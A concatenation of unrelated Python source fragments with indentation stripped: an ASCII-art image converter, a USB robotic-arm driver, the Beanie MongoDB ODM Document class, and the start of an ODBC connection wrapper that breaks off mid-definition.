# split string of chars into multiple strings of length equal to new width and create a list
new_pixels_count = len(new_pixels)
ascii_image = [new_pixels[index:index + new_width] for index in range(0, new_pixels_count, new_width)]
ascii_image = "\n".join(ascii_image)
print(ascii_image)
# write to a text file.
with open("ascii_image.txt", "w") as f:
f.write(ascii_image)
f.close()
with open("ascii_image.txt", 'r') as f:
file_contents = f.read()
print(file_contents)
f.close()
return(file_contents)
if __name__ == '__main__':
app.run(debug=True)
|
from macop.utils import progress
|
#import the USB and Time librarys into Python
import usb.core, usb.util, time, sys
import logging
log = logging.getLogger('hardware/owi_arm')
# led pesistence variable
led = 0
RoboArm = 0
def setup(robot_config):
#Allocate the name 'RoboArm' to the USB device
global RoboArm
RoboArm = usb.core.find(idVendor=0x1267, idProduct=0x000)
#Check if the arm is detected and warn if not
if RoboArm is None:
log.critical("USB Arm not found")
sys.exit()
def CtrlTransfer(a, b, c, d, e, f):
global led
error = 0
while True :
try:
e[2] = led
RoboArm.ctrl_transfer(a, b, c, d, e, f)
break
except:
error += 1
log.error("USB timeout!")
time.sleep(0.1)
if error == 5:
sys.exit()
pass
#Define a procedure to execute each movement
def MoveArm(Duration, ArmCmd):
#Start the movement
# RoboArm.ctrl_transfer(0x40,6,0x100,0,ArmCmd,3)
CtrlTransfer(0x40,6,0x100,0,ArmCmd,3)
#Stop the movement after waiting a specified duration
time.sleep(Duration)
ArmCmd=[0,0,0]
# RoboArm.ctrl_transfer(0x40,6,0x100,0,ArmCmd,3)
CtrlTransfer(0x40,6,0x100,0,ArmCmd,3)
def move(args):
global led
command = args['command']
if command == 'L':
MoveArm(0.15, [0,2,0]) # Rotate counter-clockwise
if command == 'R':
MoveArm(0.15, [0,1,0]) # Rotate clockwise
if command == 'B':
MoveArm(0.15, [128,0,0]) # Rotate Shoulder down
if command == 'F':
MoveArm(0.15, [64,0,0]) # Rotate Shoulder up
if command == 'U':
MoveArm(0.15, [16,0,0]) # Rotate Elbow up
if command == 'D':
MoveArm(0.15, [32,0,0]) # Rotate Elbow down
if command == 'W':
MoveArm(0.15, [4,0,0]) # Rotate Wrist Up
if command == 'S':
MoveArm(0.15, [8,0,0]) # Rotate Wrist Down
if command == 'C':
MoveArm(0.15, [2,0,0]) # Open Gripper
if command == 'V':
MoveArm(0.15, [1,0,0]) # Close Gripper
if command == '1':
led = 1;
MoveArm(0.15, [0,0,1]) # LED On
if command == '0':
led = 0;
MoveArm(0.15, [0,0,0]) # LED Off
|
import asyncio
import inspect
from typing import (
Dict,
Optional,
List,
Type,
Union,
Tuple,
Mapping,
TypeVar,
Any,
overload,
Set,
)
from typing import TYPE_CHECKING
from uuid import UUID, uuid4
from bson import ObjectId, DBRef
from motor.motor_asyncio import AsyncIOMotorDatabase, AsyncIOMotorCollection
from pydantic import (
ValidationError,
parse_obj_as,
PrivateAttr,
validator,
Field,
)
from pydantic.main import BaseModel
from pydantic.types import ClassVar
from pymongo import InsertOne
from pymongo.client_session import ClientSession
from pymongo.results import (
DeleteResult,
InsertManyResult,
)
from beanie.exceptions import (
CollectionWasNotInitialized,
ReplaceError,
DocumentNotFound,
RevisionIdWasChanged,
DocumentWasNotSaved,
NotSupported,
)
from beanie.odm.actions import EventTypes, wrap_with_actions, ActionRegistry
from beanie.odm.bulk import BulkWriter, Operation
from beanie.odm.cache import LRUCache
from beanie.odm.enums import SortDirection
from beanie.odm.fields import (
PydanticObjectId,
ExpressionField,
Link,
LinkInfo,
LinkTypes,
WriteRules,
DeleteRules,
)
from beanie.odm.interfaces.update import (
UpdateMethods,
)
from beanie.odm.models import (
InspectionResult,
InspectionStatuses,
InspectionError,
)
from beanie.odm.operators.find.comparison import In
from beanie.odm.queries.aggregation import AggregationQuery
from beanie.odm.queries.find import FindOne, FindMany
from beanie.odm.queries.update import UpdateMany
from beanie.odm.settings.general import DocumentSettings
from beanie.odm.utils.dump import get_dict
from beanie.odm.utils.relations import detect_link
from beanie.odm.utils.self_validation import validate_self_before
from beanie.odm.utils.state import saved_state_needed, save_state_after
if TYPE_CHECKING:
from pydantic.typing import AbstractSetIntStr, MappingIntStrAny, DictStrAny
DocType = TypeVar("DocType", bound="Document")
DocumentProjectionType = TypeVar("DocumentProjectionType", bound=BaseModel)
class Document(BaseModel, UpdateMethods):
"""
Document Mapping class.
Fields:
- `id` - MongoDB document ObjectID "_id" field.
Mapped to the PydanticObjectId class
Inherited from:
- Pydantic BaseModel
- [UpdateMethods](https://roman-right.github.io/beanie/api/interfaces/#aggregatemethods)
"""
id: Optional[PydanticObjectId] = None
# State
revision_id: Optional[UUID] = Field(default=None, hidden=True)
_previous_revision_id: Optional[UUID] = PrivateAttr(default=None)
_saved_state: Optional[Dict[str, Any]] = PrivateAttr(default=None)
# Relations
_link_fields: ClassVar[Optional[Dict[str, LinkInfo]]] = None
# Cache
_cache: ClassVar[Optional[LRUCache]] = None
# Settings
_document_settings: ClassVar[Optional[DocumentSettings]] = None
# Customization
# Query builders could be replaced in the inherited classes
_find_one_query_class: ClassVar[Type] = FindOne
_find_many_query_class: ClassVar[Type] = FindMany
# Other
_hidden_fields: ClassVar[Set[str]] = set()
@validator("revision_id")
def set_revision_id(cls, revision_id):
if not cls.get_settings().model_settings.use_revision:
return None
return revision_id or uuid4()
def __init__(self, *args, **kwargs):
super(Document, self).__init__(*args, **kwargs)
self.get_motor_collection()
async def _sync(self) -> None:
"""
Update local document from the database
:return: None
"""
if self.id is None:
raise ValueError("Document has no id")
new_instance: Optional[Document] = await self.get(self.id)
if new_instance is None:
raise DocumentNotFound(
"Can not sync. The document is not in the database anymore."
)
for key, value in dict(new_instance).items():
setattr(self, key, value)
if self.use_state_management():
self._save_state()
@wrap_with_actions(EventTypes.INSERT)
@save_state_after
@validate_self_before
async def insert(
self: DocType,
*,
link_rule: WriteRules = WriteRules.DO_NOTHING,
session: Optional[ClientSession] = None,
) -> DocType:
"""
Insert the document (self) to the collection
:return: Document
"""
if link_rule == WriteRules.WRITE:
link_fields = self.get_link_fields()
if link_fields is not None:
for field_info in link_fields.values():
value = getattr(self, field_info.field)
if field_info.link_type in [
LinkTypes.DIRECT,
LinkTypes.OPTIONAL_DIRECT,
]:
if isinstance(value, Document):
await value.insert(link_rule=WriteRules.WRITE)
if field_info.link_type == LinkTypes.LIST:
for obj in value:
if isinstance(obj, Document):
await obj.insert(link_rule=WriteRules.WRITE)
result = await self.get_motor_collection().insert_one(
get_dict(self, to_db=True), session=session
)
new_id = result.inserted_id
if not isinstance(new_id, self.__fields__["id"].type_):
new_id = self.__fields__["id"].type_(new_id)
self.id = new_id
return self
async def create(
self: DocType,
session: Optional[ClientSession] = None,
) -> DocType:
"""
The same as self.insert()
:return: Document
"""
return await self.insert(session=session)
@classmethod
async def insert_one(
cls: Type[DocType],
document: DocType,
session: Optional[ClientSession] = None,
bulk_writer: "BulkWriter" = None,
link_rule: WriteRules = WriteRules.DO_NOTHING,
) -> Optional[DocType]:
"""
Insert one document to the collection
:param document: Document - document to insert
:param session: ClientSession - pymongo session
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:param link_rule: InsertRules - hot to manage link fields
:return: DocType
"""
if not isinstance(document, cls):
raise TypeError(
"Inserting document must be of the original document class"
)
if bulk_writer is None:
return await document.insert(link_rule=link_rule, session=session)
else:
if link_rule == WriteRules.WRITE:
raise NotSupported(
"Cascade insert with bulk writing not supported"
)
bulk_writer.add_operation(
Operation(
operation=InsertOne,
first_query=get_dict(document, to_db=True),
object_class=type(document),
)
)
return None
@classmethod
async def insert_many(
cls: Type[DocType],
documents: List[DocType],
session: Optional[ClientSession] = None,
link_rule: WriteRules = WriteRules.DO_NOTHING,
) -> InsertManyResult:
"""
Insert many documents to the collection
:param documents: List["Document"] - documents to insert
:param session: ClientSession - pymongo session
:param link_rule: InsertRules - how to manage link fields
:return: InsertManyResult
"""
if link_rule == WriteRules.WRITE:
raise NotSupported(
"Cascade insert not supported for insert many method"
)
documents_list = [
get_dict(document, to_db=True) for document in documents
]
return await cls.get_motor_collection().insert_many(
documents_list,
session=session,
)
@classmethod
async def get(
cls: Type[DocType],
document_id: PydanticObjectId,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> Optional[DocType]:
"""
Get document by id, returns None if document does not exist
:param document_id: PydanticObjectId - document id
:param session: Optional[ClientSession] - pymongo session
:param ignore_cache: bool - ignore cache (if it is turned on)
:return: Union["Document", None]
"""
if not isinstance(document_id, cls.__fields__["id"].type_):
document_id = parse_obj_as(cls.__fields__["id"].type_, document_id)
return await cls.find_one(
{"_id": document_id},
session=session,
ignore_cache=ignore_cache,
fetch_links=fetch_links,
)
@overload
@classmethod
def find_one(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: None = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindOne[DocType]:
...
@overload
@classmethod
def find_one(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Type[DocumentProjectionType],
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindOne[DocumentProjectionType]:
...
@classmethod
def find_one(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Optional[Type[DocumentProjectionType]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> Union[FindOne[DocType], FindOne[DocumentProjectionType]]:
"""
Find one document by criteria.
Returns [FindOne](https://roman-right.github.io/beanie/api/queries/#findone) query object.
When awaited this will either return a document or None if no document exists for the search criteria.
:param args: *Mapping[str, Any] - search criteria
:param projection_model: Optional[Type[BaseModel]] - projection model
:param session: Optional[ClientSession] - pymongo session instance
:param ignore_cache: bool
:return: [FindOne](https://roman-right.github.io/beanie/api/queries/#findone) - find query instance
"""
return cls._find_one_query_class(document_model=cls).find_one(
*args,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
fetch_links=fetch_links,
)
@overload
@classmethod
def find_many(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: None = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindMany[DocType]:
...
@overload
@classmethod
def find_many(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Type[DocumentProjectionType] = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindMany[DocumentProjectionType]:
...
@classmethod
def find_many(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Optional[Type[DocumentProjectionType]] = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> Union[FindMany[DocType], FindMany[DocumentProjectionType]]:
"""
Find many documents by criteria.
Returns [FindMany](https://roman-right.github.io/beanie/api/queries/#findmany) query object
:param args: *Mapping[str, Any] - search criteria
:param skip: Optional[int] - The number of documents to omit.
:param limit: Optional[int] - The maximum number of results to return.
:param sort: Union[None, str, List[Tuple[str, SortDirection]]] - A key or a list of (key, direction) pairs specifying the sort order for this query.
:param projection_model: Optional[Type[BaseModel]] - projection model
:param session: Optional[ClientSession] - pymongo session
:param ignore_cache: bool
:return: [FindMany](https://roman-right.github.io/beanie/api/queries/#findmany) - query instance
"""
return cls._find_many_query_class(document_model=cls).find_many(
*args,
sort=sort,
skip=skip,
limit=limit,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
fetch_links=fetch_links,
)
@overload
@classmethod
def find(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: None = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindMany[DocType]:
...
@overload
@classmethod
def find(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Type[DocumentProjectionType],
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindMany[DocumentProjectionType]:
...
@classmethod
def find(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Optional[Type[DocumentProjectionType]] = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> Union[FindMany[DocType], FindMany[DocumentProjectionType]]:
"""
The same as find_many
"""
return cls.find_many(
*args,
skip=skip,
limit=limit,
sort=sort,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
fetch_links=fetch_links,
)
@overload
@classmethod
def find_all(
cls: Type[DocType],
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
projection_model: None = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> FindMany[DocType]:
...
@overload
@classmethod
def find_all(
cls: Type[DocType],
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
projection_model: Optional[Type[DocumentProjectionType]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> FindMany[DocumentProjectionType]:
...
@classmethod
def find_all(
cls: Type[DocType],
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
projection_model: Optional[Type[DocumentProjectionType]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> Union[FindMany[DocType], FindMany[DocumentProjectionType]]:
"""
Get all the documents
:param skip: Optional[int] - The number of documents to omit.
:param limit: Optional[int] - The maximum number of results to return.
:param sort: Union[None, str, List[Tuple[str, SortDirection]]] - A key or a list of (key, direction) pairs specifying the sort order for this query.
:param projection_model: Optional[Type[BaseModel]] - projection model
:param session: Optional[ClientSession] - pymongo session
:return: [FindMany](https://roman-right.github.io/beanie/api/queries/#findmany) - query instance
"""
return cls.find_many(
{},
skip=skip,
limit=limit,
sort=sort,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
)
@overload
@classmethod
def all(
cls: Type[DocType],
projection_model: None = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> FindMany[DocType]:
...
@overload
@classmethod
def all(
cls: Type[DocType],
projection_model: Type[DocumentProjectionType],
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> FindMany[DocumentProjectionType]:
...
@classmethod
def all(
cls: Type[DocType],
projection_model: Optional[Type[DocumentProjectionType]] = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> Union[FindMany[DocType], FindMany[DocumentProjectionType]]:
"""
the same as find_all
"""
return cls.find_all(
skip=skip,
limit=limit,
sort=sort,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
)
@wrap_with_actions(EventTypes.REPLACE)
@save_state_after
@validate_self_before
async def replace(
self: DocType,
ignore_revision: bool = False,
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
link_rule: WriteRules = WriteRules.DO_NOTHING,
) -> DocType:
"""
Fully update the document in the database
:param session: Optional[ClientSession] - pymongo session.
:param ignore_revision: bool - do force replace.
Used when revision based protection is turned on.
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:return: self
"""
if self.id is None:
raise ValueError("Document must have an id")
if bulk_writer is not None and link_rule != WriteRules.DO_NOTHING:
raise NotSupported
if link_rule == WriteRules.WRITE:
link_fields = self.get_link_fields()
if link_fields is not None:
for field_info in link_fields.values():
value = getattr(self, field_info.field)
if field_info.link_type in [
LinkTypes.DIRECT,
LinkTypes.OPTIONAL_DIRECT,
]:
if isinstance(value, Document):
await value.replace(
link_rule=link_rule,
bulk_writer=bulk_writer,
ignore_revision=ignore_revision,
session=session,
)
if field_info.link_type == LinkTypes.LIST:
for obj in value:
if isinstance(obj, Document):
await obj.replace(
link_rule=link_rule,
bulk_writer=bulk_writer,
ignore_revision=ignore_revision,
session=session,
)
use_revision_id = self.get_settings().model_settings.use_revision
find_query: Dict[str, Any] = {"_id": self.id}
if use_revision_id and not ignore_revision:
find_query["revision_id"] = self._previous_revision_id
try:
await self.find_one(find_query).replace_one(
self,
session=session,
bulk_writer=bulk_writer,
)
except DocumentNotFound:
if use_revision_id and not ignore_revision:
raise RevisionIdWasChanged
else:
raise DocumentNotFound
return self
async def save(
self: DocType,
session: Optional[ClientSession] = None,
link_rule: WriteRules = WriteRules.DO_NOTHING,
) -> DocType:
"""
Update an existing model in the database or insert it if it does not yet exist.
:param session: Optional[ClientSession] - pymongo session.
:return: None
"""
if link_rule == WriteRules.WRITE:
link_fields = self.get_link_fields()
if link_fields is not None:
for field_info in link_fields.values():
value = getattr(self, field_info.field)
if field_info.link_type in [
LinkTypes.DIRECT,
LinkTypes.OPTIONAL_DIRECT,
]:
if isinstance(value, Document):
await value.save(
link_rule=link_rule, session=session
)
if field_info.link_type == LinkTypes.LIST:
for obj in value:
if isinstance(obj, Document):
await obj.save(
link_rule=link_rule, session=session
)
try:
return await self.replace(session=session)
except (ValueError, DocumentNotFound):
return await self.insert(session=session)
@saved_state_needed
@wrap_with_actions(EventTypes.SAVE_CHANGES)
@validate_self_before
async def save_changes(
self,
ignore_revision: bool = False,
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
) -> None:
"""
Save changes.
State management usage must be turned on
:param ignore_revision: bool - ignore revision id, if revision is turned on
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:return: None
"""
if not self.is_changed:
return None
changes = self.get_changes()
await self.set(
changes, # type: ignore #TODO fix typing
ignore_revision=ignore_revision,
session=session,
bulk_writer=bulk_writer,
)
@classmethod
async def replace_many(
cls: Type[DocType],
documents: List[DocType],
session: Optional[ClientSession] = None,
) -> None:
"""
Replace list of documents
:param documents: List["Document"]
:param session: Optional[ClientSession] - pymongo session.
:return: None
"""
ids_list = [document.id for document in documents]
if await cls.find(In(cls.id, ids_list)).count() != len(ids_list):
raise ReplaceError(
"Some of the documents are not exist in the collection"
)
await cls.find(In(cls.id, ids_list), session=session).delete()
await cls.insert_many(documents, session=session)
@save_state_after
async def update(
self,
*args,
ignore_revision: bool = False,
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
) -> None:
"""
Partially update the document in the database
:param args: *Union[dict, Mapping] - the modifications to apply.
:param session: ClientSession - pymongo session.
:param ignore_revision: bool - force update. Will update even if revision id is not the same, as stored
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:return: None
"""
use_revision_id = self.get_settings().model_settings.use_revision
find_query: Dict[str, Any] = {"_id": self.id}
if use_revision_id and not ignore_revision:
find_query["revision_id"] = self._previous_revision_id
result = await self.find_one(find_query).update(
*args, session=session, bulk_writer=bulk_writer
)
if (
use_revision_id
and not ignore_revision
and result.modified_count == 0
):
raise RevisionIdWasChanged
await self._sync()
@classmethod
def update_all(
cls,
*args: Union[dict, Mapping],
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
) -> UpdateMany:
"""
Partially update all the documents
:param args: *Union[dict, Mapping] - the modifications to apply.
:param session: ClientSession - pymongo session.
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:return: UpdateMany query
"""
return cls.find_all().update_many(
*args, session=session, bulk_writer=bulk_writer
)
async def delete(
self,
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
link_rule: DeleteRules = DeleteRules.DO_NOTHING,
) -> Optional[DeleteResult]:
"""
Delete the document
:param session: Optional[ClientSession] - pymongo session.
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:param link_rule: DeleteRules - rules for link fields
:return: Optional[DeleteResult] - pymongo DeleteResult instance.
"""
if link_rule == DeleteRules.DELETE_LINKS:
link_fields = self.get_link_fields()
if link_fields is not None:
for field_info in link_fields.values():
value = getattr(self, field_info.field)
if field_info.link_type in [
LinkTypes.DIRECT,
LinkTypes.OPTIONAL_DIRECT,
]:
if isinstance(value, Document):
await value.delete(
link_rule=DeleteRules.DELETE_LINKS
)
if field_info.link_type == LinkTypes.LIST:
for obj in value:
if isinstance(obj, Document):
await obj.delete(
link_rule=DeleteRules.DELETE_LINKS
)
return await self.find_one({"_id": self.id}).delete(
session=session, bulk_writer=bulk_writer
)
@classmethod
async def delete_all(
cls,
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
) -> Optional[DeleteResult]:
"""
Delete all the documents
:param session: Optional[ClientSession] - pymongo session.
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:return: Optional[DeleteResult] - pymongo DeleteResult instance.
"""
return await cls.find_all().delete(
session=session, bulk_writer=bulk_writer
)
@overload
@classmethod
def aggregate(
cls: Type[DocType],
aggregation_pipeline: list,
projection_model: None = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> AggregationQuery[Dict[str, Any]]:
...
@overload
@classmethod
def aggregate(
cls: Type[DocType],
aggregation_pipeline: list,
projection_model: Type[DocumentProjectionType],
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> AggregationQuery[DocumentProjectionType]:
...
@classmethod
def aggregate(
cls: Type[DocType],
aggregation_pipeline: list,
projection_model: Optional[Type[DocumentProjectionType]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> Union[
AggregationQuery[Dict[str, Any]],
AggregationQuery[DocumentProjectionType],
]:
"""
Aggregate over collection.
Returns [AggregationQuery](https://roman-right.github.io/beanie/api/queries/#aggregationquery) query object
:param aggregation_pipeline: list - aggregation pipeline
:param projection_model: Type[BaseModel]
:param session: Optional[ClientSession]
:param ignore_cache: bool
:return: [AggregationQuery](https://roman-right.github.io/beanie/api/queries/#aggregationquery)
"""
return cls.find_all().aggregate(
aggregation_pipeline=aggregation_pipeline,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
)
@classmethod
async def count(cls) -> int:
"""
Number of documents in the collections
The same as find_all().count()
:return: int
"""
return await cls.find_all().count()
# State management
@classmethod
def use_state_management(cls) -> bool:
"""
Is state management turned on
:return: bool
"""
return cls.get_settings().model_settings.use_state_management
def _save_state(self) -> None:
"""
Save current document state. Internal method
:return: None
"""
if self.use_state_management():
self._saved_state = get_dict(self)
def get_saved_state(self) -> Optional[Dict[str, Any]]:
"""
Saved state getter. It is protected property.
:return: Optional[Dict[str, Any]] - saved state
"""
return self._saved_state
@classmethod
def _parse_obj_saving_state(cls: Type[DocType], obj: Any) -> DocType:
"""
Parse object and save state then. Internal method.
:param obj: Any
:return: DocType
"""
# if isinstance(obj, dict):
# for k in cls.get_link_fields().keys():
# obj[k] = obj.get(f"_link_{k}", None) or obj[k]
result: DocType = cls.parse_obj(obj)
result._save_state()
return result
@property # type: ignore
@saved_state_needed
def is_changed(self) -> bool:
if self._saved_state == get_dict(self, to_db=True):
return False
return True
@saved_state_needed
def get_changes(self) -> Dict[str, Any]:
# TODO search deeply
changes = {}
if self.is_changed:
current_state = get_dict(self, to_db=True)
for k, v in self._saved_state.items(): # type: ignore
if v != current_state[k]:
changes[k] = current_state[k]
return changes
@saved_state_needed
def rollback(self) -> None:
if self.is_changed:
for key, value in self._saved_state.items(): # type: ignore
if key == "_id":
setattr(self, "id", value)
else:
setattr(self, key, value)
# Initialization
@classmethod
def init_cache(cls) -> None:
"""
Init model's cache
:return: None
"""
if cls.get_settings().model_settings.use_cache:
cls._cache = LRUCache(
capacity=cls.get_settings().model_settings.cache_capacity,
expiration_time=cls.get_settings().model_settings.cache_expiration_time,
)
@classmethod
def init_fields(cls) -> None:
"""
Init class fields
:return: None
"""
if cls._link_fields is None:
cls._link_fields = {}
for k, v in cls.__fields__.items():
path = v.alias or v.name
setattr(cls, k, ExpressionField(path))
link_info = detect_link(v)
if link_info is not None:
cls._link_fields[v.name] = link_info
cls._hidden_fields = cls.get_hidden_fields()
@classmethod
async def init_settings(
cls, database: AsyncIOMotorDatabase, allow_index_dropping: bool
) -> None:
"""
Init document settings (collection and models)
:param database: AsyncIOMotorDatabase - motor database
:param allow_index_dropping: bool
:return: None
"""
# TODO looks ugly a little. Too many parameters transfers.
cls._document_settings = await DocumentSettings.init(
database=database,
document_model=cls,
allow_index_dropping=allow_index_dropping,
)
@classmethod
def init_actions(cls):
"""
Init event-based actions
"""
ActionRegistry.clean_actions(cls)
for attr in dir(cls):
f = getattr(cls, attr)
if inspect.isfunction(f):
if hasattr(f, "has_action"):
ActionRegistry.add_action(
document_class=cls,
event_types=f.event_types, # type: ignore
action_direction=f.action_direction, # type: ignore
funct=f,
)
@classmethod
async def init_model(
cls, database: AsyncIOMotorDatabase, allow_index_dropping: bool
) -> None:
"""
Init wrapper
:param database: AsyncIOMotorDatabase
:param allow_index_dropping: bool
:return: None
"""
await cls.init_settings(
database=database, allow_index_dropping=allow_index_dropping
)
cls.init_fields()
cls.init_cache()
cls.init_actions()
# Other
@classmethod
def get_settings(cls) -> DocumentSettings:
"""
Get document settings, which was created on
the initialization step
:return: DocumentSettings class
"""
if cls._document_settings is None:
raise CollectionWasNotInitialized
return cls._document_settings
@classmethod
def get_motor_collection(cls) -> AsyncIOMotorCollection:
"""
Get Motor Collection to access low level control
:return: AsyncIOMotorCollection
"""
collection_meta = cls.get_settings().collection_settings
return collection_meta.motor_collection
@classmethod
async def inspect_collection(
cls, session: Optional[ClientSession] = None
) -> InspectionResult:
"""
Check, if documents, stored in the MongoDB collection
are compatible with the Document schema
:return: InspectionResult
"""
inspection_result = InspectionResult()
async for json_document in cls.get_motor_collection().find(
{}, session=session
):
try:
cls.parse_obj(json_document)
except ValidationError as e:
if inspection_result.status == InspectionStatuses.OK:
inspection_result.status = InspectionStatuses.FAIL
inspection_result.errors.append(
InspectionError(
document_id=json_document["_id"], error=str(e)
)
)
return inspection_result
@classmethod
def get_hidden_fields(cls):
return set(
attribute_name
for attribute_name, model_field in cls.__fields__.items()
if model_field.field_info.extra.get("hidden") is True
)
def dict(
self,
*,
include: Union["AbstractSetIntStr", "MappingIntStrAny"] = None,
exclude: Union["AbstractSetIntStr", "MappingIntStrAny"] = None,
by_alias: bool = False,
skip_defaults: bool = None,
exclude_unset: bool = False,
exclude_defaults: bool = False,
exclude_none: bool = False,
) -> "DictStrAny":
"""
Overriding of the respective method from Pydantic
Hides fields, marked as "hidden
"""
if exclude is None:
exclude = self._hidden_fields
return super().dict(
include=include,
exclude=exclude,
by_alias=by_alias,
skip_defaults=skip_defaults,
exclude_unset=exclude_unset,
exclude_defaults=exclude_defaults,
exclude_none=exclude_none,
)
@wrap_with_actions(event_type=EventTypes.VALIDATE_ON_SAVE)
async def validate_self(self):
# TODO it can be sync, but needs some actions controller improvements
if self.get_settings().model_settings.validate_on_save:
self.parse_obj(self)
def to_ref(self):
if self.id is None:
raise DocumentWasNotSaved("Can not create dbref without id")
return DBRef(self.get_motor_collection().name, self.id)
async def fetch_link(self, field: Union[str, Any]):
ref_obj = getattr(self, field, None)
if isinstance(ref_obj, Link):
value = await ref_obj.fetch()
setattr(self, field, value)
if isinstance(ref_obj, list) and ref_obj:
values = await Link.fetch_list(ref_obj)
setattr(self, field, values)
async def fetch_all_links(self):
coros = []
link_fields = self.get_link_fields()
if link_fields is not None:
for ref in link_fields.values():
coros.append(self.fetch_link(ref.field)) # TODO lists
await asyncio.gather(*coros)
@classmethod
def get_link_fields(cls) -> Optional[Dict[str, LinkInfo]]:
return cls._link_fields
class Config:
json_encoders = {
ObjectId: lambda v: str(v),
}
allow_population_by_field_name = True
fields = {"id": "_id"}
@staticmethod
def schema_extra(
schema: Dict[str, Any], model: Type["Document"]
) -> None:
for field_name in model._hidden_fields:
schema.get("properties", {}).pop(field_name, None)
|
from enum import Enum
from cyanodbc import connect, Connection, SQLGetInfo, Cursor, DatabaseError, ConnectError
from typing import Optional
from cli_helpers.tabular_output import TabularOutputFormatter
from logging import getLogger
from re import sub
from threading import Lock, Event, Thread
from enum import IntEnum
formatter = TabularOutputFormatter()
class connStatus(Enum):
DISCONNECTED = 0
IDLE = 1
EXECUTING = 2
FETCHING = 3
ERROR = 4
class executionStatus(IntEnum):
OK = 0
FAIL = 1
OKWRESULTS = 2
class sqlConnection:
def __init__(
self,
dsn: str,
conn: Optional[Connection] = Connection(),
username: Optional[str] = "",
password: Optional[str] = ""
) -> None:
self.dsn = dsn
self.conn = conn
self.cursor: Cursor = None
self.query: str = None
self.username = username
self.password = password
self.status = connStatus.DISCONNECTED
self.logger = getLogger(__name__)
self._quotechar = None
self._search_escapechar = None
self._search_escapepattern = None
# Lock to be held by database interaction that happens
# in the main process. Recall, main-buffer as well as preview
# buffer queries get executed in a separate process, however
# auto-completion, as well as object browser expansion happen
# in the main process possibly multi-threaded. Multi threaded is fine
# we don't want the main process to lock-up while writing a query,
# however, we don't want to potentially hammer the connection with
# multiple auto-completion result queries before each has had a chance
# to return.
self._lock = Lock()
self._fetch_res: list = None
self._execution_status: executionStatus = executionStatus.OK
self._execution_err: str = None
@property
def execution_status(self) -> executionStatus:
